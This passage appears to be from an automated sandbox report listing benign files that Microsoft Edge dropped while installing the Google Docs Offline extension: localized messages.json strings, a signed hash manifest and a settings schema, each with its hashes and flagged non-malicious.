Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11406
Entropy (8bit):	5.745845607168024
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
MD5:	0A68C9539A188B8BB4F9573F2F2321D6
SHA1:	E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
SHA-256:	39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
SHA-512:	13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417954053901
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
MD5:	5E425DC36364927B1348F6C48B68C948
SHA1:	9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
SHA-256:	32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
SHA-512:	C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
Malicious:	false
